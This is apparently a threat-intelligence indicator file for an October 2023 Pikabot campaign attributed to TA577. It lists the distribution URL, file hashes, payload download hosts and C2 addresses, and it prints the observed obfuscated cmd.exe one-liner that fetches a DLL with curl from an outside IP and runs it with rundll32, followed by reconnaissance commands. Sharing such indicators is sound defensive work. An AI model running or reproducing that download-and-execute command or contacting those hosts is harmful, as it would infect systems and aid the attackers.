-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPikabot_17.10.2023.txt
69 lines (44 loc) · 2.84 KB
/
Pikabot_17.10.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
17.10.2023 | Pikabot | TA577 |
*************************************************
.url https://shubhshadi.co.in/qmun/
.zip 09636b8b2245f94c3117969148d4d5edae984f7128e38bead3f6a7791c85b440
.zip 9a44adc1b48de78f1f7d977cff79e47f2e61c61a5d6a96c20f3ae973193670e2
.dll b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62
*************************************************
zip > lnk > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\opt-13.js
cmd.exe /c TR || eChO TR & PIng TR || curl http://116.203.159.191/yAGmH/Exped -o %tMp%\TR.log & PIng -n 4 TR || RUNdll32 %Tmp%\TR.log, CrashForExceptionExportThunk & EXIT FlTRZ=jbnIYyZJ
PIng TR
PIng -n 4 TR
RUNdll32 C:\Users\Admin\AppData\Local\Temp\TR.log, CrashForExceptionExportThunk
System32\SearchProtocolHost.exe
whoami.exe /all
ipconfig.exe /all
netstat.exe -aon
*************************************************
distro url
https://shubhshadi.co.in/qmun/
*************************************************
.dll distro
http://116.203.159.191/yAGmH/Exped
http://195.201.90.237/DrDMr/presi
http://45.63.106.193/PmpZ/outcu
http://140.82.31.164/CKED/Aeros
*************************************************
c2'
url request pattern:
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.177:13721/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://80.85.140.43:9785/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.152:13720/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.167:5631/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://80.85.140.152:5938/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.174:5000/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
https://185.106.94.177:13721/CouncillaryConurbation/ChPfsiBdKMzP4y?EpisiotomiesComendite=GovernorAntherozoidal&antipyics=CouncillaryConurbation&isocymene=Onychorrhexis
185.106.94.174:5000
185.106.94.177:13721
80.85.140.43:9785
185.106.94.152:13720
85.106.94.167:5631
80.85.140.152:5938